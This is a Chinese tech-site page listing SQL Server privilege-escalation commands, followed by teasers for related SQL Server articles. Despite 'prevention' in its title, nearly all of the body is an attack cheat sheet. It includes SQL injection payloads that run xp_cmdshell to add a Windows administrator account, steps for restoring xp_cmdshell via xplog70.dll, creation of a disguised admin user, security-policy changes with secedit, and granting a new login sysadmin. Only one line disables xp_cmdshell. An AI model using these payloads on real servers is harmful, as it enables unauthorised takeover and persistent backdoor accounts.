SQL Server提升权限相关命令及防范

2016-01-29 16:49 7 1 收藏

SQL Server提升权限相关命令及防范,SQL Server提升权限相关命令及防范

【 tulaoshi.com - SQLServer 】

;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"

DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin

来源:https://www.tulaoshi.com/n/20160129/1499594.html

上一篇：《地牢猎手4》bug制作材料装备攻略
下一篇：《混沌与秩序》新手游戏心得

看过《SQL Server提升权限相关命令及防范》的人还看了以下文章更多>>

SQL Server提升权限相关命令及防范 01-29
SQL Server的用户及权限 01-29
精华推荐：SQL Server的用户及权限 01-29
Microsoft SQL Server 7.0 备份及恢复相关问题 01-29
重启IIS和SQL Server命令 02-19
SQL Server常用管理命令小结 02-19
SQL注入程序带来的攻击及防范 02-19
SQL Server2005 SQLCLR代码安全之权限 02-19
SQL Server2005SQLCLR代码安全之权限 01-29
MySQL权限提升及安全限制绕过漏洞 01-29

T-SQL命令在SQL Server查询中的运用

标签：编程语言网络编程

首先需要说明的是这篇文章的内容并不是如何调节SQL Server查询性能的（有关这方面的内容能写一本书），而是如何在SQL Server查询性能的调节中利用SET STATISTICS IO和SET STATISTICS TIME这二条被经常忽略的Transact-SQL命令的。从表面上看，查询性能的调节是一件十分简单的事。从本质上讲，我们希望查询的运行速度能够尽可能地快，...

使用FORFILES命令来删除SQL Server备份

标签：编程语言网络编程

专家解答虽然有很多种方式可以解决这个问题，但是我们可以用T-SQL代码来处理这个文件删除过程。我用xp_cmdshell命令和FORFILES命令来处理类似于你所列出的过程。可以从Microsoft TechNet中获得FORFILES的可靠信息，但是在这篇文章中，我将涉及FORFILES大量的结构和使用方法来达到你的目的。该FORFILES命令将选取文件的一个子...

生成由SQL Server管理套件产生的T-SQL命令

标签：编程语言网络编程

问题有了SQL Server管理套件你就可以做你在使用T-SQL命令时可以做的任何事情了。使用图形用户界面的一个问题是要记住所有你点击过的来再次重新执行这个动作是很困难的。另一个问题是你通过图形用户界面所做的大部分事情都立即执行了，这并不总是最好的。那么该怎样捕捉SQL Server正在做什么以便我之后可以重新执行这个动作或运行这...

SQL SERVER中字段类型及说明

标签：编程语言网络编程

格式说明: 数据类型说明同义 Bit 1位，值为0或1 Int Integer 4字节，值为-2^31~2^31-1 Smallint 2字节，值为-2^15~2^15-1 Tinyint 1字节，值为0~255 Decimal (p,s) 数字数据，固定精度为P，宽度为S Numeric Money 8字节，存放货币类型，值为-2^...

SQL Server备份出错及应对措施

标签：编程语言网络编程

关于数据库的备份恢复原理，大家多少都比较熟悉了。但是，你目前做的数据库备份有多可靠？你可以安心睡觉了吗？如果答案是肯定的，那就不用多花时间看下文了，如果觉得还不够安心，总担心数据库哪一天坏了修不好，那么请接着看： 1、我有RAID，还需要做数据库备份吗？需要。有了RAID，万一部份磁盘损坏，可以修复数据库，有的情况下数...

查看更多精彩>>